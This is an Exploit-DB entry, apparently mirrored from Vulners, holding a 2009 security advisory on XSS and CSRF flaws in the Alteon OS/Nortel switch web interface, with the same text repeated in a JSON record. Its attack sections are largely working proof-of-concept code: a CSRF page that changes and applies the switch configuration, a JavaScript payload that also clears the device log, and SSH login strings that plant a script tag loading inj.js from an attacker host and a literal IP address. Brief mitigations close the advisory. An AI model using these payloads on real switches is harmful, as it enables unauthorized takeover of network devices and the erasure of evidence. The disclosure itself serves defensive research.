Search...

Alteon OS BBI Nortell - Multiple Vulnerabilities XSS and CSRF

2009-11-16T00:00:00

ID EDB-ID:9975
Type exploitdb
Reporter Alexey Sintsov
Modified 2009-11-16T00:00:00

Description

Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS XSRF. Webapps exploit for hardware platform

                                        
                                            # Exploit Title: Alteon OS BBI (Nortell) - Multiple Vulnerabilities
# Date: 16 Nov 09
# Author: Sintsov Alexey
# Software Link: [downoad link if available]
# Version: &lt;= 21.0.8.3  and may be higher ( &lt;=25.1.0.0 )
# Tested on: [relevant os]
# Code : [exploit code]


From: DSecRG &lt;research () dsecrg com&gt;
Date: Mon, 16 Nov 2009 14:01:04 +0300

Digital Security Research Group [DSecRG] Advisory
http://dsecrg.com/pages/vul/show.php?id=161

Various XSS and XSRF vulnerabilities were identified in the  Alteon OS Browser-Based
Interface (BBI).

Application:             Alteon OS BBI
Versions Affected:       &lt;= 21.0.8.3  and may be higher ( &lt;=25.1.0.0 )
Vendor URL:              http://www.nortelnetworks.com; http://radware.com
Bug:                     XSS ans XSRF Vulnerabilities
Exploits:                YES
Reported:                11.08.2009
Secondly Reported:       07.09.2009
Final Reported:          28.10.2009
Date of Public Advisory: 16.11.2009
Solution:                YES (Non official)
Author:                  Sintsov Alexey from Digital Security Research Group [DSecRG]


Description
***********

Browser-Based Interface (BBI) software is included in the Nortel Networks(vesrions &lt; 25.0.0.0) and Radware
family of  switches. The BBI software lets you use your Web browser to access switch
information and  statistics, to perform switch configuration via the Internet. This
vulnerabilities allow remote attackers to change the switch configuration.


Details:
*******

1) XSRF

An attacker may exploit this issue to perform certain administrative actions,
e.g. change  using predictable URL requests once the user has authenticated and
obtained a valid session  with the switch.


Example
*******

PoC (Change banner and apply):

&lt;html&gt;
&lt;head&gt;

&lt;title&gt;Nortel XSRF&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;

&lt;script src="http://&lt;Switch&gt;/switchSystem.html/bar?banner=newBanner&lt;/script&gt;
&lt;script src="http://&lt;Switch&gt;/TopToolArea.html?actionState=apply"&gt;&lt;/script&gt;

&lt;/body&gt;
&lt;/html&gt;



2)  Stored XSS

An attacker may inject 36 bytes of JavaScript code into log via SSH login
parameter.   Login parameter will be written into log as is. BBI or telnet login parameter
does not write  into log - only SSH. And when log page will be generated all input
from SSH login parameter will be displayed as is.

Both vulnerabilities give chance to change switch configuration file or attack Administrator's
workstation. A possibility of  embedding a code into a log without authentication increases
attacker's chance to succeed.

Also any string parameters in BBI can be used for static XSS.


Example
*******

Crete JavaScript code and put it on evil server (inj.js), this code will
change switch banner in  current configuration, apply this change and clear log:

Proof of Concept:


var request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//Change banner
request.open("GET",
"http://&lt;NortelSwitch&gt;/switchSystem.html/bar?banner=thx2Kononenko", false);
request.send(null);


request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//apply changes
request.open("GET", "http://&lt;NortelSwitch&gt;/TopToolArea.html?actionState=apply",
false);
request.send(null);

request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//Clear log
request.open("GET", "http://&lt;NortelSwitch&gt;/clearLog.html", false);
request.send(null);


Attacker can include this code into log  without use of &lt;EvilHost&gt;.
But this way faster.

Next step - connect via SSH and inject parts of code.

Exploit:

alexey () shell#:ssh &lt;NortelSwitch&gt;

login as: &lt;script a="
&lt;script a="@&lt;NortelSwitch&gt;'s password:
Access denied^C

alexey () shell#:ssh &lt;NortelSwitch&gt;

login as: " src="http://&lt;EvilHost&gt;/inj.js" b="
" src="http://212.24.49.12/inj.js"; b=" com2="@&lt;NortelSwitch&gt;s password:
Access denied^C

alexey () shell#:ssh &lt;NortelSwitch&gt;

login as: "&gt;&lt;/script&gt;
"&gt;&lt;/script&gt;@&lt;NortelSwitch&gt;'s password:
Access denied^C


       When administrator have a look into log via BBI, his browser get that:

...
Jul  3 13:12:44 &lt;NortelSwitch&gt; NOTICE  mgmt: Failed login attempt via SSH from host
&lt;AttackerHost&gt;, user &lt;script a="&lt;BR&gt;Jul  3 13:13:08 &lt;NortelSwitch&gt; NOTICE  mgmt:
Failed login attempt via SSH from host &lt;AttackerHost&gt;, user "
src="http://&lt;EvilHost&gt;/inj.js" b="&lt;BR&gt;Jul  3 13:13:23 &lt;NortelSwitch&gt; NOTICE  mgmt:
Failed login attempt via SSH from host &lt;AttackerHost&gt;, user "&gt;&lt;/script&gt;&lt;BR&gt;



Solution:
*********

We have no answer from Radware about two month. So we don't know about
this vuln. in versions 25.0.1.0 - 25.1.0.0.

Here are our recommendations:

a) Turn off BBI.
b) Change default SSHd port.

/c/sys/access/https/https d
/c/sys/access/http d
/c/sys/access/sshd/sshport 42

c) Allow access to SSH and BBI only for trusted machines and networks;

References
**********

http://dsecrg.com/pages/vul/show.php?id=161


About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and
penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI
DSS standards. Digital Security Research Group focuses on web application and database security problems with
vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

JSON Vulners Source

Initial Source

{"published": "2009-11-16T00:00:00", "id": "EDB-ID:9975", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "hash": "cc30d4c33d69f7991e6fb9b103ef76d79e5a5524b9b98b166c7164e86e46404a", "description": "Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS XSRF. Webapps exploit for hardware platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/9975/", "lastseen": "2016-02-01T11:39:30", "edition": 1, "title": "Alteon OS BBI Nortell - Multiple Vulnerabilities XSS and CSRF", "osvdbidlist": ["60314", "60315"], "modified": "2009-11-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/9975/", "references": [], "reporter": "Alexey Sintsov", "sourceData": "# Exploit Title: Alteon OS BBI (Nortell) - Multiple Vulnerabilities\r\n# Date: 16 Nov 09\r\n# Author: Sintsov Alexey\r\n# Software Link: [downoad link if available]\r\n# Version: <= 21.0.8.3 and may be higher ( <=25.1.0.0 )\r\n# Tested on: [relevant os]\r\n# Code : [exploit code]\r\n\r\n\r\nFrom: DSecRG <research () dsecrg com>\r\nDate: Mon, 16 Nov 2009 14:01:04 +0300\r\n\r\nDigital Security Research Group [DSecRG] Advisory\r\nhttp://dsecrg.com/pages/vul/show.php?id=161\r\n\r\nVarious XSS and XSRF vulnerabilities were identified in the Alteon OS Browser-Based\r\nInterface (BBI).\r\n\r\nApplication: Alteon OS BBI\r\nVersions Affected: <= 21.0.8.3 and may be higher ( <=25.1.0.0 )\r\nVendor URL: http://www.nortelnetworks.com; http://radware.com\r\nBug: XSS ans XSRF Vulnerabilities\r\nExploits: YES\r\nReported: 11.08.2009\r\nSecondly Reported: 07.09.2009\r\nFinal Reported: 28.10.2009\r\nDate of Public Advisory: 16.11.2009\r\nSolution: YES (Non official)\r\nAuthor: Sintsov Alexey from Digital Security Research Group [DSecRG]\r\n\r\n\r\nDescription\r\n***********\r\n\r\nBrowser-Based Interface (BBI) software is included in the Nortel Networks(vesrions < 25.0.0.0) and Radware\r\nfamily of switches. The BBI software lets you use your Web browser to access switch\r\ninformation and statistics, to perform switch configuration via the Internet. This\r\nvulnerabilities allow remote attackers to change the switch configuration.\r\n\r\n\r\nDetails:\r\n*******\r\n\r\n1) XSRF\r\n\r\nAn attacker may exploit this issue to perform certain administrative actions,\r\ne.g. change using predictable URL requests once the user has authenticated and\r\nobtained a valid session with the switch.\r\n\r\n\r\nExample\r\n*******\r\n\r\nPoC (Change banner and apply):\r\n\r\n<html>\r\n<head>\r\n\r\n<title>Nortel XSRF</title>\r\n</head>\r\n<body>\r\n\r\n<script src=\"http://<Switch>/switchSystem.html/bar?banner=newBanner</script>\r\n<script src=\"http://<Switch>/TopToolArea.html?actionState=apply\"></script>\r\n\r\n</body>\r\n</html>\r\n\r\n\r\n\r\n2) Stored XSS\r\n\r\nAn attacker may inject 36 bytes of JavaScript code into log via SSH login\r\nparameter. Login parameter will be written into log as is. BBI or telnet login parameter\r\ndoes not write into log - only SSH. And when log page will be generated all input\r\nfrom SSH login parameter will be displayed as is.\r\n\r\nBoth vulnerabilities give chance to change switch configuration file or attack Administrator's\r\nworkstation. A possibility of embedding a code into a log without authentication increases\r\nattacker's chance to succeed.\r\n\r\nAlso any string parameters in BBI can be used for static XSS.\r\n\r\n\r\nExample\r\n*******\r\n\r\nCrete JavaScript code and put it on evil server (inj.js), this code will\r\nchange switch banner in current configuration, apply this change and clear log:\r\n\r\nProof of Concept:\r\n\r\n\r\nvar request = !window.ActiveXObject ? new XMLHttpRequest() : new\r\nActiveXObject(\"Microsoft.XMLHTTP\");\r\n\r\n//Change banner\r\nrequest.open(\"GET\",\r\n\"http://<NortelSwitch>/switchSystem.html/bar?banner=thx2Kononenko\", false);\r\nrequest.send(null);\r\n\r\n\r\nrequest = !window.ActiveXObject ? new XMLHttpRequest() : new\r\nActiveXObject(\"Microsoft.XMLHTTP\");\r\n\r\n//apply changes\r\nrequest.open(\"GET\", \"http://<NortelSwitch>/TopToolArea.html?actionState=apply\",\r\nfalse);\r\nrequest.send(null);\r\n\r\nrequest = !window.ActiveXObject ? new XMLHttpRequest() : new\r\nActiveXObject(\"Microsoft.XMLHTTP\");\r\n\r\n//Clear log\r\nrequest.open(\"GET\", \"http://<NortelSwitch>/clearLog.html\", false);\r\nrequest.send(null);\r\n\r\n\r\nAttacker can include this code into log without use of <EvilHost>.\r\nBut this way faster.\r\n\r\nNext step - connect via SSH and inject parts of code.\r\n\r\nExploit:\r\n\r\nalexey () shell#:ssh <NortelSwitch>\r\n\r\nlogin as: <script a=\"\r\n<script a=\"@<NortelSwitch>'s password:\r\nAccess denied^C\r\n\r\nalexey () shell#:ssh <NortelSwitch>\r\n\r\nlogin as: \" src=\"http://<EvilHost>/inj.js\" b=\"\r\n\" src=\"http://212.24.49.12/inj.js\"; b=\" com2=\"@<NortelSwitch>s password:\r\nAccess denied^C\r\n\r\nalexey () shell#:ssh <NortelSwitch>\r\n\r\nlogin as: \"></script>\r\n\"></script>@<NortelSwitch>'s password:\r\nAccess denied^C\r\n\r\n\r\n When administrator have a look into log via BBI, his browser get that:\r\n\r\n...\r\nJul 3 13:12:44 <NortelSwitch> NOTICE mgmt: Failed login attempt via SSH from host\r\n<AttackerHost>, user <script a=\"<BR>Jul 3 13:13:08 <NortelSwitch> NOTICE mgmt:\r\nFailed login attempt via SSH from host <AttackerHost>, user \"\r\nsrc=\"http://<EvilHost>/inj.js\" b=\"<BR>Jul 3 13:13:23 <NortelSwitch> NOTICE mgmt:\r\nFailed login attempt via SSH from host <AttackerHost>, user \"></script><BR>\r\n\r\n\r\n\r\nSolution:\r\n*********\r\n\r\nWe have no answer from Radware about two month. So we don't know about\r\nthis vuln. in versions 25.0.1.0 - 25.1.0.0.\r\n\r\nHere are our recommendations:\r\n\r\na) Turn off BBI.\r\nb) Change default SSHd port.\r\n\r\n/c/sys/access/https/https d\r\n/c/sys/access/http d\r\n/c/sys/access/sshd/sshport 42\r\n\r\nc) Allow access to SSH and BBI only for trusted machines and networks;\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=161\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security is leading IT security company in Russia, providing information security consulting, audit and\r\npenetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI\r\nDSS standards. Digital Security Research Group focuses on web application and database security problems with\r\nvulnerability reports, advisories and whitepapers posted regularly on our website.\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\n", "objectVersion": "1.0"}